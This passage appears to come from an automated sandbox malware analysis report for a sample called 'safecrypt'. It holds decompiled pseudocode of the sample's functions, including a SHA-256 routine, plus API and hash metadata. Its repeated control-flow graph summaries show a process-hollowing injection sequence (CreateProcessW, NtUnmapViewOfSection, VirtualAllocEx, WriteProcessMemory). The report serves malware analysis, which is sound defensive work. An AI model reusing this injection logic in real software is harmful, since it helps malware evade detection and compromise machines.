                    					_t62 =  *0x439ea8;
                    					_t50 = _t49 - 8;
                    					 *_t50 = _t62;
                    					E0041CBC0(_a1040,  &_a1040);
                    					_t43 = _a28;
                    					_t49 = _t50 + 8;
                    					_push( &_a1040);
                    					_push(_a28);
                    				} while (_a80() != 0 && GetTickCount() < _t34);
                    				_t18 = _a76;
                    				if(_t18 == 0) {
                    					_t43 = _a20;
                    					CloseHandle(_a20);
                    				} else {
                    					 *_t18(_a20);
                    				}
                    				FreeLibrary(_t44);
                    				E0041D250(_t62);
                    				GlobalMemoryStatus( &_a160);
                    				_t23 =  *0x460aa8;
                    				if(_t23 == 0) {
                    					_t23 = 0x43e45c;
                    					 *0x460aa8 = 0x43e45c;
                    				}
                    				_t10 = _t23 + 0xc; // 0x41c3e0
                    				_t24 =  *_t10;
                    				if(_t24 != 0) {
                    					asm("fld1");
                    					_t53 = _t49 - 8;
                    					 *_t53 = _t62;
                    					 *_t24( &_a160, 0x20);
                    					_t49 = _t53 + 0x10;
                    				}
                    				_a68 = GetCurrentProcessId();
                    				_t26 =  *0x460aa8;
                    				if(_t26 == 0) {
                    					_t26 = 0x43e45c;
                    					 *0x460aa8 = 0x43e45c;
                    				}
                    				_t13 = _t26 + 0xc; // 0x41c3e0
                    				_t27 =  *_t13;
                    				if(_t27 != 0) {
                    					asm("fld1");
                    					_t52 = _t49 - 8;
                    					 *_t52 = _t62;
                    					_t43 =  &_a68;
                    					 *_t27( &_a68, 4);
                    					_t49 = _t52 + 0x10;
                    				}
                    				_pop(_t45);
                    				_pop(_t46);
                    				_pop(_t35);
                    				return E004256D3(1, _t35, _a2164 ^ _t49, _t43, _t45, _t46);
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 0041D187
                    • CloseHandle.KERNEL32(?), ref: 0041D1A3
                    • FreeLibrary.KERNEL32(00000000), ref: 0041D1AA
                    • GlobalMemoryStatus.KERNEL32 ref: 0041D1BD
                    • GetCurrentProcessId.KERNEL32 ref: 0041D1F4
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCountCurrentFreeGlobalHandleLibraryMemoryProcessStatusTick
                    • String ID:
                    • API String ID: 3344549487-0
                    • Opcode ID: f14c230c9ccc8a2ccc2d7843bb33b22adb17a32e06f9557670c591d7eb1fae3f
                    • Instruction ID: ba4e17c7f7ac259dc165b9a78ae4b29c1bc9cc1aed2ea462726c5d1746d1710e
                    • Opcode Fuzzy Hash: f14c230c9ccc8a2ccc2d7843bb33b22adb17a32e06f9557670c591d7eb1fae3f
                    • Instruction Fuzzy Hash: 7B2151706043409FD724EFA5DC85BABB7E4AB84700F04892DE598C7290EBB8D494CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E00414520(signed int __eax, void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t61;
                    				intOrPtr _t63;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				intOrPtr* _t71;
                    				intOrPtr* _t73;
                    				intOrPtr _t78;
                    				void* _t80;
                    				intOrPtr* _t82;
                    				void* _t84;
                    				signed int _t87;
                    				signed int _t88;
                    				void* _t92;
                    				intOrPtr* _t93;
                    				void* _t95;
                    				void* _t98;
                    				void* _t100;
                    				void* _t103;
                    				signed int _t114;
                    				signed int _t115;
                    				signed int _t130;
                    				signed int _t132;
                    				signed int _t135;
                    				signed int _t138;
                    				void* _t140;
                    
                    				_t104 = __ecx;
                    				_t140 = (_t138 & 0xfffffff8) - 0x1c;
                    				_t61 = __eax | 0xffffffff;
                    				_v20 = _t61;
                    				_v28 = 0;
                    				if(_a8 > 0x7fffffff) {
                    					L38:
                    					return _t61;
                    				}
                    				_t103 = E0040BB10();
                    				if(_t103 == 0) {
                    					L37:
                    					_t61 = _v20;
                    					goto L38;
                    				} else {
                    					_t63 =  *((intOrPtr*)(_t103 + 0x24));
                    					if(_t63 != 0 ||  *((intOrPtr*)(_t103 + 0x28)) != _t63) {
                    						 *((intOrPtr*)(_t103 + 0x24)) = _t63 + 1;
                    					} else {
                    						_t7 = _t103 + 0x14; // 0x14
                    						_t100 = E0040BCF0(__ecx, _t7,  *(_t103 + 0x20));
                    						_t140 = _t140 + 4;
                    						if(_t100 == 0) {
                    							 *((intOrPtr*)(_t103 + 0x24)) =  *((intOrPtr*)(_t103 + 0x24)) + 1;
                    						}
                    					}
                    					_v24 = E0040BC90(_t103);
                    					_v8 = E0040BC90(_t103);
                    					_t67 = _a16;
                    					_t124 =  *(_t67 + 0xc);
                    					if(_t124 == 0) {
                    						L27:
                    						_t68 =  *((intOrPtr*)(_t103 + 0x24));
                    						if(_t68 == 0) {
                    							 *(_t103 + 0x18) =  *(_t103 + 0x18) - 1;
                    							_t124 =  *( *((intOrPtr*)(_t103 + 0x14)) +  *(_t103 + 0x18) * 4);
                    							_t112 =  *(_t103 + 0x20);
                    							if(_t124 <  *(_t103 + 0x20)) {
                    								E0040BF40(_t112 - _t124, _t103);
                    							}
                    							 *(_t103 + 0x20) = _t124;
                    							 *((intOrPtr*)(_t103 + 0x28)) = 0;
                    						} else {
                    							 *((intOrPtr*)(_t103 + 0x24)) = _t68 - 1;
                    						}
                    						E0040BBA0(_t124, _t103);
                    						_t130 = _v28;
                    						if(_t130 != 0) {
                    							_t71 =  *0x48048c;
                    							if(_t71 != 0) {
                    								 *_t71(_t130, 0);
                    								_t140 = _t140 + 8;
                    							}
                    							 *0x43def4(_t130);
                    							_t73 =  *0x48048c;
                    							if(_t73 != 0) {
                    								 *_t73(0, 1);
                    							}
                    						}
                    						goto L37;
                    					}
                    					_t132 =  *(_t67 + 4);
                    					_v16 = _t132;
                    					_t78 = E00419760(_t132);
                    					_t140 = _t140 + 4;
                    					_v12 = _t78;
                    					if(_t78 == 0) {
                    						goto L27;
                    					}
                    					_t114 = _t124;
                    					_t124 = 0;
                    					_t80 = E00419AA0(_a12, _t104, _t114, 0, _t132, _t78, _t103);
                    					_t140 = _t140 + 0xc;
                    					if(_t80 == 0) {
                    						L26:
                    						E00419810(_v12);
                    						goto L27;
                    					}
                    					if( *((intOrPtr*)( *_t132 + 4)) != 0x196) {
                    						L13:
                    						_t82 =  *((intOrPtr*)( *_t132 + 0x20));
                    						if(_t82 != 0) {
                    							_t82 =  *_t82(_t132);
                    							_t140 = _t140 + 4;
                    						}
                    						asm("cdq");
                    						_t115 = _t114 & 0x00000007;
                    						_t135 = _t115 + _t82 + 7 >> 3;
                    						_t84 = E0040D3A0(_v24);
                    						asm("cdq");
                    						_t87 = _t84 + 7 + (_t115 & 0x00000007) >> 3;
                    						_v16 = _t87;
                    						if(_t87 <= _t135) {
                    							if(_t135 > 0) {
                    								_t124 = 0x460a3e;
                    								_t88 = E00423310(0x460a3e, _t135, 0x460a3f);
                    								_t140 = _t140 + 8;
                    								_v28 = _t88;
                    								if(_t88 != 0) {
                    									_t124 = _t135 - _v16;
                    									E0042C770(_t88, 0, _t135 - _v16);
                    									_t92 = E0040D950(_v28 + _t135 - _v16, _v24, _v24);
                    									_t140 = _t140 + 0x10;
                    									if(_v16 == _t92) {
                    										_t93 = _a20;
                    										if(_t93 == 0) {
                    											_t124 = _a8;
                    											if(_t124 > _t135) {
                    												_t124 = _t135;
                    												_a8 = _t124;
                    											}
                    											E0042E030(_a4, _v28, _t124);
                    											_t140 = _t140 + 0xc;
                    											_v20 = _t124;
                    										} else {
                    											_t95 =  *_t93(_v28, _t135, _a4,  &_a8);
                    											_t140 = _t140 + 0x10;
                    											if(_t95 != 0) {
                    												_v20 = _a8;
                    											}
                    										}
                    									}
                    								}
                    							} else {
                    								_v28 = _t124;
                    							}
                    						}
                    						goto L26;
                    					}
                    					_t114 = _v16;
                    					_t98 = E00419920(_t114, _v12, _v24, _v8, _t103);
                    					_t140 = _t140 + 0xc;
                    					if(_t98 == 0) {
                    						goto L26;
                    					} else {
                    						_t132 = _v16;
                    						goto L13;
                    					}
                    				}
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove_memset
                    • String ID: >F
                    • API String ID: 3555123492-3034848679
                    • Opcode ID: 1e6c59de961fb395a59345e686be5d814ce06bb1ff0872b7afe9e3d4a26e85f7
                    • Instruction ID: 38e41979de80e12f217b0ca997a06e69b4c1d38a8df81b1616e366d242e29da9
                    • Opcode Fuzzy Hash: 1e6c59de961fb395a59345e686be5d814ce06bb1ff0872b7afe9e3d4a26e85f7
                    • Instruction Fuzzy Hash: B261C3B5A002019BCB10DF25C841A9B77E5AFD5318F14452EFC58AB346E738ED45CBEA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00420970(intOrPtr __ebx, void* __ecx, intOrPtr __edx, signed int _a4) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				intOrPtr _v96;
                    				intOrPtr _v100;
                    				intOrPtr _v104;
                    				intOrPtr _v108;
                    				intOrPtr _v112;
                    				intOrPtr _v116;
                    				intOrPtr _v120;
                    				char _v124;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t16;
                    				intOrPtr _t26;
                    				void* _t33;
                    				intOrPtr _t35;
                    				intOrPtr _t37;
                    				intOrPtr _t38;
                    				signed int _t39;
                    
                    				_t31 = __edx;
                    				_t26 = __ebx;
                    				_t41 = (_t39 & 0xfffffff8) - 0x78;
                    				_t16 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t16 ^ (_t39 & 0xfffffff8) - 0x00000078;
                    				_t37 = __edx;
                    				_t33 = __ecx;
                    				if(__edx == 0) {
                    					_t37 = 0x43fe20;
                    				}
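                    				// E0042C770 corresponds to the _memset API ID listed for this function: zero the 0x70-byte hash context.
                    				E0042C770( &_v124, 0, 0x70);
                    				// The eight constants below are the SHA-256 initial hash values H0..H7.
                    				_v124 = 0x6a09e667;
                    				_v120 = 0xbb67ae85;
                    				_v116 = 0x3c6ef372;
                    				_v112 = 0xa54ff53a;
                    				_v108 = 0x510e527f;
                    				_v104 = 0x9b05688c;
                    				_v100 = 0x1f83d9ab;
                    				_v96 = 0x5be0cd19;
                    				// 0x20 = 32, the SHA-256 digest size in bytes.
                    				_v16 = 0x20;
                    				// The two callees are not identified in this report; assumed to be the hash update and finalisation steps.
                    				E00420A20(_a4,  &_v124, _t33);
                    				E00420B10(_t37,  &_v124,  &_v124);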
                    				_pop(_t35);
                    				_pop(_t38);
                    				return E004256D3(_t37, _t26, _v8 ^ _t41 + 0x00000010, _t31, _t35, _t38);
                    			}























                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: $gj
                    • API String ID: 2102423945-3974221788
                    • Opcode ID: 09918698e4845557b0bd3e0cf5f6a2c0036d65cbc4cb3a1c5bc7356cb77e2c70
                    • Instruction ID: 34cc73ecb4f3ab7085046afdbcf90def6ba550cc793d1cb971f106a4578d33c0
                    • Opcode Fuzzy Hash: 09918698e4845557b0bd3e0cf5f6a2c0036d65cbc4cb3a1c5bc7356cb77e2c70
                    • Instruction Fuzzy Hash: E501E571A183149BC310EF55D84265FFBE4ABC9B54F804A1EF8945B261C774D9018BCB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:5.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:287
                    Total number of Limit Nodes:12

                    Graph


                    Executed Functions

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction ID: b15af8fd1cfb61fc4de74625df18664adf058829690075a91bbe992520ab5509
                    • Opcode Fuzzy Hash: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction Fuzzy Hash: F702903DB19617FEEF16A7718C12F3D6999FB81B05F249529F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction ID: 4adbc832822baa37ba9096dce791b1f4f0e597d4608bcdb3e9e2ab2ca8d1ae81
                    • Opcode Fuzzy Hash: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction Fuzzy Hash: 12F19D3DB19617FDEF16A7618C22F3D6999FB81B05F249529F0839A142FE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction ID: 7c193c2b8651b1357d9986823ab49bbffff5f4c8a5b5688a18a108b58e9d5317
                    • Opcode Fuzzy Hash: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction Fuzzy Hash: DDF19C3DA19617FDEF16A7618C12F3D6999FB81B05F249519F0839A182FE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction ID: 0ad2f77988de8f04cbbdd166e7e3d4c3872255c2022bb9bfe16423b7b3f68440
                    • Opcode Fuzzy Hash: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction Fuzzy Hash: D4F18D3DA19617FDEF16A7718C12F3D699AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction ID: 9c8496152c69372821fee955f93d46b48514be13c72fdc0983a7136e642f4238
                    • Opcode Fuzzy Hash: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction Fuzzy Hash: F4E1AD3DB19617FDEF16A7618C12F3D699AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction ID: a4e908b56dc978b6ff007bd212fe6a69a6346ce3d8a7fdb702832f57bbf98603
                    • Opcode Fuzzy Hash: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction Fuzzy Hash: 77E1AD3DB19617FDEF16A7618C12F3D699AFB81B05F249519F0839A182EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d91899 to d91ec3; named API calls in graph order: VirtualFree, CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction ID: 8c5378ce689e8cb20dc1759d8ee48188671ecce060d0852ccd6acccb316de79d
                    • Opcode Fuzzy Hash: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction Fuzzy Hash: DEE1AE3DB19617FDEF16A7618C22F3D699AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d918d5 to d91ec3; named API calls in graph order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction ID: d63e4ae5fff5cc92277b64da135a9d720dd6281029ef70ecddb5e39f52d1989a
                    • Opcode Fuzzy Hash: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction Fuzzy Hash: 88E1BD3DB59613FEEF16A7618C12F3D799AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d918ff to d91ec3; named API calls in graph order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction ID: b8fe69488217c46b42b79912097f4a713ce109aca2c80ce0e8eb714e5863c70a
                    • Opcode Fuzzy Hash: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction Fuzzy Hash: 2DD18E3DB59613FEEF16A7618C12F3D699AFB81B05F249519B0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d918e3 to d91ec3; named API calls in graph order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction ID: 0b29d9b4544a65169b6c48647a376d29415d03dffd8a383d22b36a85923cea26
                    • Opcode Fuzzy Hash: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction Fuzzy Hash: 1AE18D3DB59613EEEF16A7618C12F3D799AFB81B05F249519F0839A142EE34CE026931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d91946 to d91ec3; named API calls in graph order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction ID: 8440ca84c3f161b70d7a9886fe45f9bd29f4cc35130eea0ef06dd4e9eb0f88f0
                    • Opcode Fuzzy Hash: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction Fuzzy Hash: 9FD1BE3DB59613EEEF16A7718C12F3D799AFB81B05F249519F0839A142EE34CE026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d91963 to d91ec3; named API calls in graph order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: e605bd3c0e246f08737236fa7de905c815f15f95786545e65953fbd56888bc4b
                    • Instruction ID: d23d7c20b8a2205e9d2b85566b898ad97124393e4a7eee7d79708059221c1480
                    • Opcode Fuzzy Hash: e605bd3c0e246f08737236fa7de905c815f15f95786545e65953fbd56888bc4b
                    • Instruction Fuzzy Hash: 46D1BE3DB19617EEEF17A7618C12F3D799AFB81B05F249519F0839A142EE34CE026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    [Control-flow graph, blocks d91983 to d91ec3; named API calls in graph order: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory]
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 748bf721d01c502860e9775896c194a095d8b5eebc9736f8a83b4fbbb4f5a150
                    • Instruction ID: 4b9b2d8e1eb27843f05c7350b74c9aac13bf664741c8cc0fae8aaf9b8075f0fc
                    • Opcode Fuzzy Hash: 748bf721d01c502860e9775896c194a095d8b5eebc9736f8a83b4fbbb4f5a150
                    • Instruction Fuzzy Hash: F4C1BD3DB59613EEEF17A7618C12F3D799AFB81B05F249519F0839A142EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 424baeb5f877a7e89357698537ebc65fbf47ae713fa12991aab065b5bf8d565f
                    • Instruction ID: 87cd23f9624e5e77dfbb3c71cbaf98d0e44f41649cf7ef07dba89b83678fb491
                    • Opcode Fuzzy Hash: 424baeb5f877a7e89357698537ebc65fbf47ae713fa12991aab065b5bf8d565f
                    • Instruction Fuzzy Hash: 12C19D3DB59613EEEF17A7618C12F3D7D9AFB81B05F249519B0839A142EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: b7de26201dfb25a511b6ba7062084ab4186202995379a929b75e60b010e66dc8
                    • Instruction ID: 6518281b1a64101043514440c7a2f6d3fd8250afd6d9d78967c24486d4dff312
                    • Opcode Fuzzy Hash: b7de26201dfb25a511b6ba7062084ab4186202995379a929b75e60b010e66dc8
                    • Instruction Fuzzy Hash: CEC1BE3DB59613EEEF17A7618C12F3D799AFB81B05F249519F0839A142EE34CE026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: de8202db822ea1921288a02b86e575b5a62394531f140fd65f8fef09a0339bd6
                    • Instruction ID: 053adda743b056a786f2d601ed7088f9fddd2bb39b60773364661e88488de1be
                    • Opcode Fuzzy Hash: de8202db822ea1921288a02b86e575b5a62394531f140fd65f8fef09a0339bd6
                    • Instruction Fuzzy Hash: 62C1C03DB59617EEEF17A7618C12F3D79A9FB41B05F249518F0839A142EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 2f902628984d4289033428fb04088459c95369ca4467549356379d6328fdebd6
                    • Instruction ID: c2fd47a2466cbc69ed16b6a1cb83935fe39c690d03c0a5b2edba7ff8bc231018
                    • Opcode Fuzzy Hash: 2f902628984d4289033428fb04088459c95369ca4467549356379d6328fdebd6
                    • Instruction Fuzzy Hash: 7AB1C03DB59617EEEF17A7618C12F3D79A9FB41B05F249518F0839A042EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 5eec219bc5f763040baa4ce212192e92bfdb3eb2bc2b66e16641bb9413b8d155
                    • Instruction ID: 9466e0a4b183b514cf5bc128f0f4d24511d59e7e2df6f35483b56e92cf2c9e06
                    • Opcode Fuzzy Hash: 5eec219bc5f763040baa4ce212192e92bfdb3eb2bc2b66e16641bb9413b8d155
